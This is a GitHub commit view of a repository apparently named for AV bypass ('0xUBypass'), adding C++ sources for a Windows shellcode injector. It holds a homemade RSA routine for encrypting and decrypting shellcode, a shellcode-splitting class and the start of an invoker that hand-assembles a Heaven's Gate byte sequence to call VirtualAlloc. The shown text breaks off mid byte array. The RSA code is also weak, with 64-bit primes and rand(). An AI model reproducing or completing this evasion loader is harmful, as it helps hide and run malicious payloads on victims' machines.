STRLCPY/0xUBypass

have fun
Yeuoly committed 2 years ago

20347aff

■ ■ ■ ■ ■ ■

.gitignore

1	+	## Ignore Visual Studio temporary files, build results, and
2	+	## files generated by popular Visual Studio add-ons.
3	+	##
4	+	## Get latest from https://github.com/github/gitignore/blob/main/VisualStudio.gitignore
5	+
6	+	# User-specific files
7	+	*.rsuser
8	+	*.suo
9	+	*.user
10	+	*.userosscache
11	+	*.sln.docstates
12	+
13	+	# User-specific files (MonoDevelop/Xamarin Studio)
14	+	*.userprefs
15	+
16	+	# Mono auto generated files
17	+	mono_crash.*
18	+
19	+	# Build results
20	+	[Dd]ebug/
21	+	[Dd]ebugPublic/
22	+	[Rr]elease/
23	+	[Rr]eleases/
24	+	x64/
25	+	x86/
26	+	[Ww][Ii][Nn]32/
27	+	[Aa][Rr][Mm]/
28	+	[Aa][Rr][Mm]64/
29	+	bld/
30	+	[Bb]in/
31	+	[Oo]bj/
32	+	[Ll]og/
33	+	[Ll]ogs/
34	+
35	+	# Visual Studio 2015/2017 cache/options directory
36	+	.vs/
37	+	# Uncomment if you have tasks that create the project's static files in wwwroot
38	+	#wwwroot/
39	+
40	+	# Visual Studio 2017 auto generated files
41	+	Generated\ Files/
42	+
43	+	# MSTest test Results
44	+	[Tt]est[Rr]esult*/
45	+	[Bb]uild[Ll]og.*
46	+
47	+	# NUnit
48	+	*.VisualState.xml
49	+	TestResult.xml
50	+	nunit-*.xml
51	+
52	+	# Build Results of an ATL Project
53	+	[Dd]ebugPS/
54	+	[Rr]eleasePS/
55	+	dlldata.c
56	+
57	+	# Benchmark Results
58	+	BenchmarkDotNet.Artifacts/
59	+
60	+	# .NET Core
61	+	project.lock.json
62	+	project.fragment.lock.json
63	+	artifacts/
64	+
65	+	# ASP.NET Scaffolding
66	+	ScaffoldingReadMe.txt
67	+
68	+	# StyleCop
69	+	StyleCopReport.xml
70	+
71	+	# Files built by Visual Studio
72	+	*_i.c
73	+	*_p.c
74	+	*_h.h
75	+	*.ilk
76	+	*.meta
77	+	*.obj
78	+	*.iobj
79	+	*.pch
80	+	*.pdb
81	+	*.ipdb
82	+	*.pgc
83	+	*.pgd
84	+	*.rsp
85	+	*.sbr
86	+	*.tlb
87	+	*.tli
88	+	*.tlh
89	+	*.tmp
90	+	*.tmp_proj
91	+	*_wpftmp.csproj
92	+	*.log
93	+	*.tlog
94	+	*.vspscc
95	+	*.vssscc
96	+	.builds
97	+	*.pidb
98	+	*.svclog
99	+	*.scc
100	+
101	+	# Chutzpah Test files
102	+	_Chutzpah*
103	+
104	+	# Visual C++ cache files
105	+	ipch/
106	+	*.aps
107	+	*.ncb
108	+	*.opendb
109	+	*.opensdf
110	+	*.sdf
111	+	*.cachefile
112	+	*.VC.db
113	+	*.VC.VC.opendb
114	+
115	+	# Visual Studio profiler
116	+	*.psess
117	+	*.vsp
118	+	*.vspx
119	+	*.sap
120	+
121	+	# Visual Studio Trace Files
122	+	*.e2e
123	+
124	+	# TFS 2012 Local Workspace
125	+	$tf/
126	+
127	+	# Guidance Automation Toolkit
128	+	*.gpState
129	+
130	+	# ReSharper is a .NET coding add-in
131	+	_ReSharper*/
132	+	*.[Rr]e[Ss]harper
133	+	*.DotSettings.user
134	+
135	+	# TeamCity is a build add-in
136	+	_TeamCity*
137	+
138	+	# DotCover is a Code Coverage Tool
139	+	*.dotCover
140	+
141	+	# AxoCover is a Code Coverage Tool
142	+	.axoCover/*
143	+	!.axoCover/settings.json
144	+
145	+	# Coverlet is a free, cross platform Code Coverage Tool
146	+	coverage*.json
147	+	coverage*.xml
148	+	coverage*.info
149	+
150	+	# Visual Studio code coverage results
151	+	*.coverage
152	+	*.coveragexml
153	+
154	+	# NCrunch
155	+	_NCrunch_*
156	+	.crunch.local.xml
157	+	nCrunchTemp_*
158	+
159	+	# MightyMoose
160	+	.mm.
161	+	AutoTest.Net/
162	+
163	+	# Web workbench (sass)
164	+	.sass-cache/
165	+
166	+	# Installshield output folder
167	+	[Ee]xpress/
168	+
169	+	# DocProject is a documentation generator add-in
170	+	DocProject/buildhelp/
171	+	DocProject/Help/*.HxT
172	+	DocProject/Help/*.HxC
173	+	DocProject/Help/*.hhc
174	+	DocProject/Help/*.hhk
175	+	DocProject/Help/*.hhp
176	+	DocProject/Help/Html2
177	+	DocProject/Help/html
178	+
179	+	# Click-Once directory
180	+	publish/
181	+
182	+	# Publish Web Output
183	+	*.[Pp]ublish.xml
184	+	*.azurePubxml
185	+	# Note: Comment the next line if you want to checkin your web deploy settings,
186	+	# but database connection strings (with potential passwords) will be unencrypted
187	+	*.pubxml
188	+	*.publishproj
189	+
190	+	# Microsoft Azure Web App publish settings. Comment the next line if you want to
191	+	# checkin your Azure Web App publish settings, but sensitive information contained
192	+	# in these scripts will be unencrypted
193	+	PublishScripts/
194	+
195	+	# NuGet Packages
196	+	*.nupkg
197	+	# NuGet Symbol Packages
198	+	*.snupkg
199	+	# The packages folder can be ignored because of Package Restore
200	+	*/[Pp]ackages/
201	+	# except build/, which is used as an MSBuild target.
202	+	!**/[Pp]ackages/build/
203	+	# Uncomment if necessary however generally it will be regenerated when needed
204	+	#!**/[Pp]ackages/repositories.config
205	+	# NuGet v3's project.json files produces more ignorable files
206	+	*.nuget.props
207	+	*.nuget.targets
208	+
209	+	# Microsoft Azure Build Output
210	+	csx/
211	+	*.build.csdef
212	+
213	+	# Microsoft Azure Emulator
214	+	ecf/
215	+	rcf/
216	+
217	+	# Windows Store app package directories and files
218	+	AppPackages/
219	+	BundleArtifacts/
220	+	Package.StoreAssociation.xml
221	+	_pkginfo.txt
222	+	*.appx
223	+	*.appxbundle
224	+	*.appxupload
225	+
226	+	# Visual Studio cache files
227	+	# files ending in .cache can be ignored
228	+	*.[Cc]ache
229	+	# but keep track of directories ending in .cache
230	+	!?*.[Cc]ache/
231	+
232	+	# Others
233	+	ClientBin/
234	+	~$*
235	+	*~
236	+	*.dbmdl
237	+	*.dbproj.schemaview
238	+	*.jfm
239	+	*.pfx
240	+	*.publishsettings
241	+	orleans.codegen.cs
242	+
243	+	# Including strong name files can present a security risk
244	+	# (https://github.com/github/gitignore/pull/2483#issue-259490424)
245	+	#*.snk
246	+
247	+	# Since there are multiple workflows, uncomment next line to ignore bower_components
248	+	# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
249	+	#bower_components/
250	+
251	+	# RIA/Silverlight projects
252	+	Generated_Code/
253	+
254	+	# Backup & report files from converting an old project file
255	+	# to a newer Visual Studio version. Backup files are not needed,
256	+	# because we have git ;-)
257	+	_UpgradeReport_Files/
258	+	Backup*/
259	+	UpgradeLog*.XML
260	+	UpgradeLog*.htm
261	+	ServiceFabricBackup/
262	+	*.rptproj.bak
263	+
264	+	# SQL Server files
265	+	*.mdf
266	+	*.ldf
267	+	*.ndf
268	+
269	+	# Business Intelligence projects
270	+	*.rdl.data
271	+	*.bim.layout
272	+	.bim_.settings
273	+	*.rptproj.rsuser
274	+	*- [Bb]ackup.rdl
275	+	*- [Bb]ackup ([0-9]).rdl
276	+	*- [Bb]ackup ([0-9][0-9]).rdl
277	+
278	+	# Microsoft Fakes
279	+	FakesAssemblies/
280	+
281	+	# GhostDoc plugin setting file
282	+	*.GhostDoc.xml
283	+
284	+	# Node.js Tools for Visual Studio
285	+	.ntvs_analysis.dat
286	+	node_modules/
287	+
288	+	# Visual Studio 6 build log
289	+	*.plg
290	+
291	+	# Visual Studio 6 workspace options file
292	+	*.opt
293	+
294	+	# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
295	+	*.vbw
296	+
297	+	# Visual Studio 6 auto-generated project file (contains which files were open etc.)
298	+	*.vbp
299	+
300	+	# Visual Studio 6 workspace and project file (working project files containing files to include in project)
301	+	*.dsw
302	+	*.dsp
303	+
304	+	# Visual Studio 6 technical files
305	+	*.ncb
306	+	*.aps
307	+
308	+	# Visual Studio LightSwitch build output
309	+	*/.HTMLClient/GeneratedArtifacts
310	+	*/.DesktopClient/GeneratedArtifacts
311	+	*/.DesktopClient/ModelManifest.xml
312	+	*/.Server/GeneratedArtifacts
313	+	*/.Server/ModelManifest.xml
314	+	_Pvt_Extensions
315	+
316	+	# Paket dependency manager
317	+	.paket/paket.exe
318	+	paket-files/
319	+
320	+	# FAKE - F# Make
321	+	.fake/
322	+
323	+	# CodeRush personal settings
324	+	.cr/personal
325	+
326	+	# Python Tools for Visual Studio (PTVS)
327	+	__pycache__/
328	+	*.pyc
329	+
330	+	# Cake - Uncomment if you are using it
331	+	# tools/**
332	+	# !tools/packages.config
333	+
334	+	# Tabs Studio
335	+	*.tss
336	+
337	+	# Telerik's JustMock configuration file
338	+	*.jmconfig
339	+
340	+	# BizTalk build output
341	+	*.btp.cs
342	+	*.btm.cs
343	+	*.odx.cs
344	+	*.xsd.cs
345	+
346	+	# OpenCover UI analysis results
347	+	OpenCover/
348	+
349	+	# Azure Stream Analytics local run output
350	+	ASALocalRun/
351	+
352	+	# MSBuild Binary and Structured Log
353	+	*.binlog
354	+
355	+	# NVidia Nsight GPU debugger configuration file
356	+	*.nvuser
357	+
358	+	# MFractors (Xamarin productivity tool) working folder
359	+	.mfractor/
360	+
361	+	# Local History for Visual Studio
362	+	.localhistory/
363	+
364	+	# Visual Studio History (VSHistory) files
365	+	.vshistory/
366	+
367	+	# BeatPulse healthcheck temp database
368	+	healthchecksdb
369	+
370	+	# Backup folder for Package Reference Convert tool in Visual Studio 2017
371	+	MigrationBackup/
372	+
373	+	# Ionide (cross platform F# VS Code tools) working folder
374	+	.ionide/
375	+
376	+	# Fody - auto-generated XML schema
377	+	FodyWeavers.xsd
378	+
379	+	# VS Code files for those working on multiple tools
380	+	.vscode/*
381	+	!.vscode/settings.json
382	+	!.vscode/tasks.json
383	+	!.vscode/launch.json
384	+	!.vscode/extensions.json
385	+	*.code-workspace
386	+
387	+	# Local History for Visual Studio Code
388	+	.history/
389	+
390	+	# Windows Installer files from build outputs
391	+	*.cab
392	+	*.msi
393	+	*.msix
394	+	*.msm
395	+	*.msp
396	+
397	+	# JetBrains Rider
398	+	*.sln.iml

■ ■ ■ ■ ■ ■

WindowsShellcodeInjector/RSA.cpp

1	+	#include"RSA.h"
2	+	#include<iostream>
3	+	#include<time.h>
4	+	#include<stack>
5	+
6	+	clock_t start, finish;
7	+	#define TESTTIME(code, module) start = clock(); \
8	+	code \
9	+	finish = clock(); \
10	+	std::cout << "module:" << module " takes " << finish - start << std::endl;
11	+
12	+	BigUint math::Gcd(BigUint a, BigUint b) {
13	+	if (a == 0) {
14	+	return b;
15	+	}
16	+	if (a > b) {
17	+	return Gcd(b, a);
18	+	}
19	+	return Gcd(b % a, a);
20	+	}
21	+
22	+	void rsa::init() {
23	+	srand(time(NULL));
24	+	}
25	+
26	+	int phi(int n)
27	+	{
28	+	float result = n;
29	+	for (int p = 2; p * p <= n; ++p)
30	+	{
31	+	if (n % p == 0)
32	+	{
33	+	while (n % p == 0)
34	+	n /= p;
35	+	result *= (1.0 - (1.0 / (float)p));
36	+	}
37	+	}
38	+
39	+	if (n > 1)
40	+	result *= (1.0 - (1.0 / (float)n));
41	+
42	+	return (int)result;
43	+	}
44	+
45	+	BigUint math::Phi(BigUint e) {
46	+	BigUint result = e;
47	+
48	+	for (BigUint p = 2; p * p <= e; p++) {
49	+	if (e % p == 0) {
50	+	while (e % p == 0) {
51	+	e /= p;
52	+	}
53	+	result = result - result / p;
54	+	}
55	+	}
56	+
57	+	if (e > 1) {
58	+	result = result - result / e;
59	+	}
60	+
61	+	return result;
62	+	}
63	+
64	+	BigUint math::Powmod(BigUint n, BigUint e, BigUint m) {
65	+	if (e == 1) return n % m;
66	+	if (e == 0) return 1;
67	+
68	+	if ((e & 1) == 1) {
69	+	// y = n ^ e mod m
70	+	// y = ((n mod m) * ((n ^ (e-1) mod m))) mod m
71	+	return ((n % m) * (Powmod(n, e - 1, m))) % m;
72	+	}
73	+	BigUint tmp = Powmod(n, e / 2, m);
74	+	return (tmp * tmp) % m;
75	+	}
76	+
77	+	BigUint math::Invert(BigUint a, BigUint n) {
78	+	BigUint result;
79	+	mpz_invert(result.get_mpz_t(), a.get_mpz_t(), n.get_mpz_t());
80	+	return result;
81	+	}
82	+
83	+	BigUint math::Lcm(BigUint a, BigUint b) {
84	+	return a * b / Gcd(a, b);
85	+	}
86	+
87	+	BigUint repeatMod(BigUint x, BigUint a) {
88	+	BigUint b = x - 1;
89	+	BigUint ans = 1;
90	+	int times = 0;
91	+	while (b > 0) {
92	+	times++;
93	+	if ((b & 1) == 1) {
94	+	ans = ((ans % x) * (a % x)) % x;
95	+	}
96	+	a = a * a % x;
97	+	b >>= 1;
98	+	}
99	+	return ans;
100	+	}
101	+
102	+	bool math::IsPrime(BigUint n, int k) {
103	+	//Miller-Rabin
104	+	while (k--) {
105	+	BigUint t = RandomNumber(2, n - 2) + 2;
106	+	while (t % n == 0) {
107	+	t = RandomNumber(2, n - 2) + 2;
108	+	}
109	+	if (repeatMod(n, t) != 1) {
110	+	return false;
111	+	}
112	+	}
113	+	return true;
114	+	}
115	+
116	+	BigUint math::RandomNumber(BigUint min, BigUint max) {
117	+	const int random_max = 2 << 14;
118	+	BigUint distance = max - min;
119	+	if (distance == 0) {
120	+	return 0;
121	+	}
122	+	if (distance < random_max) {
123	+	return rand() % distance;
124	+	}
125	+
126	+	BigUint result = 0;
127	+	while (distance >= random_max) {
128	+	result = result * random_max + rand();
129	+	distance /= random_max;
130	+	}
131	+
132	+	result += min;
133	+
134	+	while (result > max) {
135	+	result >>= 1;
136	+	}
137	+
138	+	return result;
139	+	}
140	+
141	+
142	+	BigUint rsa::GeneratePrime(int bits) {
143	+	if (bits == 0) return 0;
144	+	if (bits == 1) return 1;
145	+
146	+	BigUint smallest = BigUint(1) << (bits - 1);
147	+	BigUint biggest = (BigUint(1) << bits) - 1;
148	+	BigUint result = math::RandomNumber(smallest, biggest);
149	+	while (!math::IsPrime(result, 40)) {
150	+	//get a rand number greater than smallest
151	+	result = math::RandomNumber(smallest, biggest);
152	+	}
153	+	return result;
154	+	}
155	+
156	+	BigUint rsa::GenerateN(BigUint p, BigUint q) {
157	+	return p * q;
158	+	}
159	+
160	+	BigUint rsa::GeneratePhi(BigUint p, BigUint q) {
161	+	return (p - 1) * (q - 1);
162	+	}
163	+
164	+	BigUint rsa::GenerateE(BigUint phi) {
165	+	BigUint e;
166	+	mpz_sqrt(e.get_mpz_t(), phi.get_mpz_t());
167	+	mpz_sqrt(e.get_mpz_t(), e.get_mpz_t());
168	+	for (; e < phi; e++) {
169	+	if (math::Gcd(e, phi) == 1) {
170	+	return e;
171	+	}
172	+	}
173	+
174	+	return 7;
175	+	}
176	+
177	+	BigUint rsa::GenerateD(BigUint e, BigUint phi) {
178	+	return math::Invert(e, phi);
179	+	}
180	+
181	+	BigUint rsa::Encrypt(BigUint m, BigUint e, BigUint N) {
182	+	BigUint result = 0;
183	+	mpz_powm(result.get_mpz_t(), m.get_mpz_t(), e.get_mpz_t(), N.get_mpz_t());
184	+	return result;
185	+	}
186	+
187	+	BigUint rsa::Decrypt(BigUint c, BigUint d, BigUint N) {
188	+	BigUint result = 0;
189	+	mpz_powm(result.get_mpz_t(), c.get_mpz_t(), d.get_mpz_t(), N.get_mpz_t());
190	+	return result;
191	+	}
192	+
193	+	void std::Printable2Number(string src, BigUint &ed, BigUint &N) {
194	+	size_t idx = src.find(':');
195	+	if (idx == std::string::npos) {
196	+	return;
197	+	}
198	+	size_t srclen = src.length();
199	+	ed = 0, N = 0;
200	+	for (size_t i = 0; i < idx; i++) {
201	+	ed = ed * PrintableSize + PrintableInvertTable[src[i]];
202	+	}
203	+	for (size_t i = idx + 1; i < srclen; i++) {
204	+	N = N * PrintableSize + PrintableInvertTable[src[i]];
205	+	}
206	+	}
207	+
208	+	void std::Number2Printable(string &dst, BigUint ed, BigUint N) {
209	+	stack<uint8_t> num;
210	+	while (ed > 0) {
211	+	BigUint remainder = ed % PrintableSize;
212	+	uint8_t unit = (uint8_t)remainder.get_ui();
213	+	ed /= PrintableSize;
214	+	num.push(PrintableConvertTable[unit]);
215	+	}
216	+	while (!num.empty()) {
217	+	dst += num.top();
218	+	num.pop();
219	+	}
220	+
221	+	dst.append(":");
222	+
223	+	while (N > 0) {
224	+	BigUint remainder = N % PrintableSize;
225	+	uint8_t unit = (uint8_t)remainder.get_ui();
226	+	N /= PrintableSize;
227	+	num.push(PrintableConvertTable[unit]);
228	+	}
229	+
230	+	while (!num.empty()) {
231	+	dst += num.top();
232	+	num.pop();
233	+	}
234	+	}
235	+
236	+	void std::GeneratePair(string &private_key, string &public_key) {
237	+	BigUint p = rsa::GeneratePrime(ENCRYPT_KEY_SIZE);
238	+	BigUint q = rsa::GeneratePrime(ENCRYPT_KEY_SIZE);
239	+	BigUint N = rsa::GenerateN(p, q);
240	+	BigUint phi = rsa::GeneratePhi(p, q);
241	+	BigUint e = rsa::GenerateE(phi);
242	+	BigUint d = rsa::GenerateD(e, phi);
243	+
244	+	Number2Printable(public_key, e, N);
245	+	Number2Printable(private_key, d, N);
246	+	}
247	+
248	+	void P(BigUint src, size_t bits, uint8_t *dst) {
249	+	for (int i = 0; i < bits / 8; i++) {
250	+	BigUint unit = src & 0xff;
251	+	dst[i] = (uint8_t)unit.get_ui();
252	+	src >>= 8;
253	+	}
254	+	}
255	+
256	+	void U(uint8_t *src, size_t bits, BigUint &dst) {
257	+	dst = 0;
258	+	for (int i = (bits / 8) - 1; i >= 0; i--) {
259	+	dst = dst * 0x100 + src[i];
260	+	}
261	+	}
262	+
263	+	void std::EncryptShell(uint8_t src, size_t srclen, uint8_t dst, size_t dstlen, string public_key) {
264	+	BigUint e = 0, N = 0;
265	+	Printable2Number(public_key, e, N);
266	+
267	+	//convert char[] to BigUint[]
268	+	BigUint tmp_size = CEIL(srclen, (ENCRYPT_BLOCK_SIZE / 8));
269	+	BigUint *tmp = new BigUint[tmp_size.get_ui()];
270	+
271	+	for (BigUint i = 0; i < tmp_size; i++) {
272	+	tmp[i.get_ui()] = 0;
273	+	U(src + (ENCRYPT_BLOCK_SIZE / 8) * i.get_ui(), ENCRYPT_BLOCK_SIZE, tmp[i.get_ui()]);
274	+	}
275	+
276	+	//encrypt
277	+	for (BigUint i = 0; i < tmp_size; i++) {
278	+	tmp[i.get_ui()] = rsa::Encrypt(tmp[i.get_ui()], e, N);
279	+	}
280	+
281	+	//convert BigUint[] to char[]
282	+	for (BigUint i = 0; i < tmp_size; i++) {
283	+	P(tmp[i.get_ui()], ENCRYPT_DST_SIZE, dst + (ENCRYPT_DST_SIZE / 8) * i.get_ui());
284	+	}
285	+
286	+	delete[tmp_size.get_ui()]tmp;
287	+	}
288	+
289	+	void std::DecryptShell(uint8_t src, size_t srclen, uint8_t dst, size_t dstlen, string private_key) {
290	+	BigUint d = 0, N = 0;
291	+	Printable2Number(private_key, d, N);
292	+
293	+	//convert char[] to BigUint[]
294	+	BigUint tmp_size = CEIL(srclen, (ENCRYPT_DST_SIZE / 8));
295	+	BigUint *tmp = new BigUint[tmp_size.get_ui()];
296	+
297	+	for (BigUint i = 0; i < tmp_size; i++) {
298	+	tmp[i.get_ui()] = 0;
299	+	U(src + (ENCRYPT_DST_SIZE / 8) * i.get_ui(), ENCRYPT_DST_SIZE, tmp[i.get_ui()]);
300	+	}
301	+
302	+	//encrypt
303	+	for (BigUint i = 0; i < tmp_size; i++) {
304	+	tmp[i.get_ui()] = rsa::Decrypt(tmp[i.get_ui()], d, N);
305	+	}
306	+
307	+	//convert BigUint[] to char[]
308	+	for (BigUint i = 0; i < tmp_size; i++) {
309	+	P(tmp[i.get_ui()], ENCRYPT_BLOCK_SIZE, dst + (ENCRYPT_BLOCK_SIZE / 8) * i.get_ui());
310	+	}
311	+
312	+	delete[tmp_size.get_ui()]tmp;
313	+	}

■ ■ ■ ■ ■ ■

WindowsShellcodeInjector/RSA.h

1	+	#pragma once
2	+	#include"mini-gmpxx.h"
3	+	#include<stdint.h>
4	+
5	+	#define BigUint mpz_class
6	+
7	+	#define ENCRYPT_KEY_SIZE (8 * 8)
8	+	#define ENCRYPT_BLOCK_SIZE (ENCRYPT_KEY_SIZE)
9	+	#define ENCRYPT_DST_SIZE (ENCRYPT_KEY_SIZE * 2)
10	+
11	+	#define CEIL(a, b) ((a % b) > 0 ? ((a / b) + 1) : (a / b))
12	+
13	+	#define PRINTARR(arr) for(int i = 0; i < sizeof(arr); i++) printf("%02x", arr[i])
14	+
15	+	namespace rsa {
16	+	//Generate a prime greater than 2^bits
17	+	BigUint GeneratePrime(int bits);
18	+
19	+	//phi equals to (p - 1) * (q - 1);
20	+	BigUint GeneratePhi(BigUint p, BigUint q);
21	+
22	+	//Genertae a prime e
23	+	BigUint GenerateE(BigUint phi);
24	+
25	+	//ed = 1 (mod phi)
26	+	BigUint GenerateD(BigUint e, BigUint phi);
27	+
28	+	//Encrypt
29	+	BigUint Encrypt(BigUint m, BigUint e, BigUint N);
30	+
31	+	//Decrypt
32	+	BigUint Decrypt(BigUint c, BigUint d, BigUint N);
33	+
34	+	//Generate N equals to p * q;
35	+	BigUint GenerateN(BigUint p, BigUint q);
36	+
37	+	void init();
38	+	};
39	+
40	+	namespace math {
41	+	//Generate a^-1 mod n
42	+	BigUint Invert(BigUint a, BigUint n);
43	+
44	+	//n ^ e mod m
45	+	BigUint Powmod(BigUint n, BigUint e, BigUint m);
46	+
47	+	BigUint Phi(BigUint e);
48	+
49	+	//Greatest Common Dividor
50	+	BigUint Gcd(BigUint a, BigUint b);
51	+
52	+	//Lessest Common
53	+	BigUint Lcm(BigUint a, BigUint b);
54	+
55	+	//Test if a number is prime
56	+	bool IsPrime(BigUint n, int k);
57	+
58	+	//Generate a random number between min and max
59	+	BigUint RandomNumber(BigUint min, BigUint max);
60	+	};
61	+
62	+	namespace std {
63	+	constexpr static char PrintableConvertTable[] = {
64	+	'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'm', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
65	+	'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',
66	+	'/', '\\', '?', '!', '@', '#', '$', '%', '^', '&', '*', '(', ')', '-', '+', '=', '[', ']', '\|', ';', '<', '>', '.', ',', '~', '`',
67	+	'0', '1', '2', '3', '4', '5', '6', '7', '8', '9'
68	+	};
69	+	constexpr static char PrintableInvertTable[] = {
70	+	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 55, 0,
71	+	57, 58, 59, 61, 0, 63, 64, 62, 66, 75, 65, 74, 52, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 0, 71, 72, 67,
72	+	73, 54, 56, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
73	+	50, 51, 68, 53, 69, 60, 0, 77, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 0, 14, 15, 16, 17, 18, 19, 20, 21,
74	+	22, 23, 24, 25, 0, 70, 0, 76, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
75	+	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
76	+	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
77	+	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
78	+	};
79	+	constexpr static int PrintableSize = sizeof(PrintableConvertTable);
80	+
81	+	void Printable2Number(string src, BigUint &ed, BigUint &N);
82	+
83	+	void Number2Printable(string &dst, BigUint ed, BigUint N);
84	+
85	+	void GeneratePair(string &private_key, string &public_key);
86	+
87	+	void EncryptShell(uint8_t src, size_t srclen, uint8_t dst, size_t dstlen, string public_key);
88	+
89	+	void DecryptShell(uint8_t src, size_t srclen, uint8_t dst, size_t dstlen, string private_key);
90	+
91	+	#define NEEDED_ENCRYPT_LENGTH(SRC_LEN) ((CEIL(SRC_LEN, (ENCRYPT_BLOCK_SIZE / 8)) * (ENCRYPT_DST_SIZE / 8)))
92	+	};

■ ■ ■ ■ ■ ■

WindowsShellcodeInjector/ShellcodeSplitor.cpp

1 + #include "ShellcodeSplitor.h"
2 +
3 +

All occurrences

■ ■ ■ ■ ■ ■

WindowsShellcodeInjector/ShellcodeSplitor.h

1	+	#pragma once
2	+	#include<Windows.h>
3	+	#include<vector>
4	+
5	+	class ShellcodeItem {
6	+	public:
7	+	UINT32 length;
8	+	UINT8 *codes;
9	+
10	+	ShellcodeItem(UINT32 length, UINT8 *codes) {
11	+	this->codes = (UINT8 *)malloc(length);
12	+	for (int i = 0; i < length; i++) {
13	+	this->codes[i] = codes[i];
14	+	}
15	+	}
16	+
17	+	~ShellcodeItem() {
18	+	free(codes);
19	+	}
20	+	};
21	+
22	+	class ShellcodeContainer {
23	+	public:
24	+	UINT32 size;
25	+	std::vector<ShellcodeItem *> codes;
26	+
27	+	void push(ShellcodeItem *);
28	+
29	+	ShellcodeItem *pop();
30	+
31	+	~ShellcodeContainer();
32	+	};
33	+
34	+	class ShellcodeSplitor {
35	+	private:
36	+	UINT8 *shellcode;
37	+	UINT32 length;
38	+	public:
39	+	ShellcodeSplitor(UINT8 *shellcode, UINT32 length) {
40	+	this->shellcode = (UINT8 *)malloc(length);
41	+	for (int i = 0; i < length; i++) {
42	+	this->shellcode[i] = shellcode[i];
43	+	}
44	+	}
45	+
46	+	~ShellcodeSplitor() {
47	+	if (shellcode != NULL) {
48	+	free(shellcode);
49	+	}
50	+	}
51	+
52	+	ShellcodeContainer *split();
53	+	};

■ ■ ■ ■ ■ ■

WindowsShellcodeInjector/Utils.cpp

1	+	#include"RSA.h"
2	+	#include"Utils.h"
3	+	#include<iostream>
4	+
5	+	/*
6	+	I Just do not understand... there is about 1/8 probability that encrypt would fault, but... why?? signed?
7	+	I tried many ways, but.. ok, I choice a more efficiency way
8	+	*/
9	+	void GenerateKey(std::string &public_key, std::string &private_key) {
10	+	bool flag = false;
11	+	rsa::init();
12	+	while (!flag) {
13	+	flag = true;
14	+	public_key = "";
15	+	private_key = "";
16	+	std::GeneratePair(private_key, public_key);
17	+	uint8_t shellcode[] = {
18	+	0x12, 0x34, 0x56, 0x78, 0x12, 0x34, 0x56, 0x78,
19	+	0x12, 0x34, 0x56, 0x78, 0x12, 0x34, 0x56, 0x78
20	+	};
21	+	uint8_t encrypted_shellcode[NEEDED_ENCRYPT_LENGTH(sizeof(shellcode))] = { 0 };
22	+	uint8_t decrypted_shellcode[sizeof(shellcode)] = { 0 };
23	+
24	+	std::EncryptShell(shellcode, sizeof(shellcode), encrypted_shellcode, sizeof(encrypted_shellcode), public_key);
25	+	std::DecryptShell(encrypted_shellcode, sizeof(encrypted_shellcode), decrypted_shellcode, sizeof(decrypted_shellcode), private_key);
26	+
27	+	for (int i = 0; i < sizeof(shellcode); i++) {
28	+	if (shellcode[i] != decrypted_shellcode[i]) {
29	+	flag = false;
30	+	}
31	+	}
32	+	}
33	+	}

■ ■ ■ ■ ■ ■

WindowsShellcodeInjector/Utils.h

1 + #pragma once
2 +
3 + #include<string>
4 +
5 + void GenerateKey(std::string &public_key, std::string &private_key);

All occurrences

■ ■ ■ ■ ■ ■

WindowsShellcodeInjector/WindowsShellcodeInjector.cpp

1	+	#include<iostream>
2	+	#include<Windows.h>
3	+	#include"WindowsShellcodeInjector.h"
4	+
5	+	void WindowsShellCodeInvoke::p32(UINT32 src, UINT8 *dst) {
6	+	for (int i = 0; i < 4; i++) {
7	+	dst[i] = src & 0xff;
8	+	src >>= 8;
9	+	}
10	+	}
11	+
12	+	void WindowsShellCodeInvoke::p64(UINT64 src, UINT8 *dst) {
13	+	for (int i = 0; i < 8; i++) {
14	+	dst[i] = src & 0xff;
15	+	src >>= 8;
16	+	}
17	+	}
18	+
19	+	LPVOID WindowsShellCodeInvoke::VirtualAllocMemory(LPVOID base, UINT32 size, UINT32 flAllocationType, UINT32 flProtect) {
20	+	UINT64 base_address = (UINT64)base;
21	+	UINT8 p_base_address[4];
22	+	p32((UINT32)&base_address, p_base_address);
23	+
24	+	UINT64 region_size = size;
25	+	UINT8 p_region_size[4];
26	+	p32((UINT32)&region_size, p_region_size);
27	+
28	+	UINT64 tmp = flAllocationType;
29	+	UINT8 fl_allocation_type[8];
30	+	p64(tmp, fl_allocation_type);
31	+
32	+	UINT8 fl_protect[8];
33	+	tmp = flProtect;
34	+	p64(tmp, fl_protect);
35	+
36	+	#define FLAT_ARRAY_DWORD(arr, base) arr[0 + base], arr[1 + base], arr[2 + base], arr[3 + base]
37	+	#define FLAT_ARRAY_QWORD(arr, base) FLAT_ARRAY_DWORD(arr, base + 0), FLAT_ARRAY_DWORD(arr, base + 4)
38	+
39	+	UINT8 bytes_sequence[] = {
40	+	FUNCTION_ENTER,
41	+	HEAVENS_GAET_ENTER,
42	+
43	+	0x48, 0x31, 0xC9, // xor rcx, rcx
